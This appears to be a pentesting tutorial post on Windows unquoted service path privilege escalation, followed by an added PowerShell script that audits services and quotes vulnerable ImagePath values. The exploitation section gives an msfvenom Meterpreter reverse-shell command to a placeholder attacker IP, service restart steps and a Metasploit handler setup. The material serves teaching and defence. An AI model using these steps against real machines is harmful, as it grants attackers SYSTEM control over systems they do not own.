Hey everyone! 👋
I wanted to break down a classic but super underrated privilege escalation technique that every pentester should know: unquoted service paths on Windows.
---
🔑 Why Should You Care?
Privilege escalation is one of the key goals during a pentest. Getting initial access is cool — but you really want SYSTEM rights, right? Well, sometimes the simplest misconfigurations can give you exactly that. And unquoted service paths are a perfect example.
---
🧐 So, What’s an Unquoted Service Path?
Let’s skip the boring definitions. In Windows, services often run with high privileges. If the path to the service’s executable contains a space but isn’t wrapped in quotes, the service control manager hands that ambiguous string to CreateProcess, which treats each space as a possible end of the executable name (appending .exe) and tries those shorter candidates before the full path. So Windows can end up launching the wrong file: one that you, the attacker, may have planted.
Example:
Suppose the path is:
C:\Program Files\MyApp\service.exe
If it’s not wrapped in " ", Windows might look for:
C:\Program.exe
first. If you manage to drop a malicious Program.exe at C:\, Windows might run it with SYSTEM privileges when the service starts. 🎉
---
🔍 How Do You Find This?
Good news: finding unquoted service paths is dead simple.
Run:
sc qc "ServiceName"
If the BINARY_PATH_NAME shows a path with spaces without quotes — jackpot!
Next, check your write permissions:
icacls "C:\Program Files\MyApp"
If normal users can write there, you’re in business. (On a default install, standard users can’t create files directly in C:\ itself, so it’s usually a directory further along the path that turns out to be writable.)
---
⚙️ How Do You Exploit It?
1️⃣ Check the Service’s Privileges
Make sure it’s running as SYSTEM or another high-privileged account.
2️⃣ Create Your Payload
Generate a malicious executable, e.g., a reverse shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f exe > Program.exe
3️⃣ Drop the Payload
Place your Program.exe in the vulnerable path — say, C:\.
4️⃣ Restart the Service
sc stop "ServiceName" && sc start "ServiceName"
Boom! Your payload runs as SYSTEM.
5️⃣ Catch the Shell
Fire up Metasploit:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set LPORT 4444
exploit
Congrats — you’re SYSTEM! 🔓
---
🛡️ How Do You Fix It?
If you’re a defender, it’s simple:
✅ Always use quotes around paths with spaces in service configurations.
✅ Use least privilege — don’t run services as SYSTEM unless you must.
✅ Audit permissions — make sure regular users can’t write to service directories.
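Here’s an added audit-and-fix script that ties the “How Do You Find This?” section and this checklist together. It is my example, not code from the original post. It assumes an elevated PowerShell 5.1 or later session on the host being checked, and the function names (Get-UnquotedPathCandidates, Test-LowPrivWritable) and the -Fix switch are my own choices. It goes a bit beyond the single C:\Program.exe case above: it lists every candidate CreateProcess would try for an unquoted path, flags which of those directories low-privilege groups can write to, and with -Fix wraps the executable path in quotes in the registry.

```powershell
# Added example (not from the original post): audit services for unquoted
# ImagePaths with spaces, show the candidates CreateProcess would try, flag
# candidate directories writable by low-privilege groups, optionally quote them.
# Assumes an elevated PowerShell 5.1+ session. Run with -Fix -WhatIf first.
[CmdletBinding(SupportsShouldProcess = $true)]
param(
    [switch]$Fix   # rewrite each unquoted ImagePath with quotes around the executable
)

# Groups a standard (non-admin) user is typically a member of.
$lowPrivGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Rights that allow creating a file in a directory: WriteData/CreateFiles (2),
# plus the generic GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) bits.
$writeMask = 2 -bor 0x40000000 -bor 0x10000000

# Given an unquoted path with spaces, return the executables CreateProcess would
# try, in order: each prefix ending at a space gets ".exe" appended, and the
# full path comes last. "C:\Program Files\My App\svc.exe" yields
# C:\Program.exe, C:\Program Files\My.exe, C:\Program Files\My App\svc.exe.
function Get-UnquotedPathCandidates {
    param([string]$ExePath)
    $candidates = @()
    $parts = $ExePath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $prefix = $parts[0..($i - 1)] -join ' '
        $candidates += "$prefix.exe"
    }
    $candidates += $ExePath
    return $candidates
}

# Heuristic: does any low-privilege group hold an Allow ACE with a write bit on
# this directory? Deny ACEs and true effective access are not evaluated, so
# treat a hit as "go look at this", not as proof.
function Test-LowPrivWritable {
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $acl = Get-Acl -LiteralPath $Directory
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivGroups -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights) -band $writeMask) { return $true }
    }
    return $false
}

$findings = foreach ($svc in Get-CimInstance Win32_Service) {
    $image = $svc.PathName
    if (-not $image -or $image.StartsWith('"')) { continue }   # quoted or empty: nothing to do
    # Split the executable from its arguments: everything up to the first ".exe".
    if ($image -match '^(?<exe>.*?\.exe)(?<args>.*)$') { $exe = $Matches.exe; $svcArgs = $Matches.args }
    else { $exe = $image; $svcArgs = '' }
    if ($exe -notmatch ' ') { continue }                        # no space: the path is unambiguous

    $candidates = Get-UnquotedPathCandidates $exe
    # The last candidate is the real binary; the earlier ones are where a planted file would sit.
    $weak = $candidates[0..($candidates.Count - 2)] |
        Where-Object { Test-LowPrivWritable (Split-Path $_ -Parent) }
    $writable = if ($weak) { 'LOW-PRIV USERS: ' + ($weak -join '; ') } else { 'admins only' }

    [pscustomobject]@{
        Service    = $svc.Name
        RunsAs     = $svc.StartName
        ImagePath  = $image
        Candidates = $candidates -join '; '
        WritableBy = $writable
    }

    if ($Fix) {
        # Quote the executable in place; the SCM reads ImagePath on the next start.
        $regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        $kind    = (Get-Item -LiteralPath $regPath).GetValueKind('ImagePath')
        $quoted  = "`"$exe`"$svcArgs"
        if ($PSCmdlet.ShouldProcess($svc.Name, "set ImagePath to $quoted")) {
            Set-ItemProperty -LiteralPath $regPath -Name ImagePath -Value $quoted -Type $kind
        }
    }
}

$findings | Format-Table -AutoSize
```

Save it as a .ps1 and run it plain to get the report, then with -Fix -WhatIf to preview the registry writes before committing them with -Fix. Preserving the existing value kind matters because ImagePath is usually REG_EXPAND_SZ, and the writable check only looks at Allow ACEs for a fixed set of groups, so confirm anything it flags with icacls as the post describes.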
---
💡 Wrapping Up
Unquoted service paths are old but gold. They’re still out there in the wild because sysadmins sometimes overlook tiny misconfigurations. Mastering tricks like this sets you apart — especially if you’re prepping for exams like the OSCP.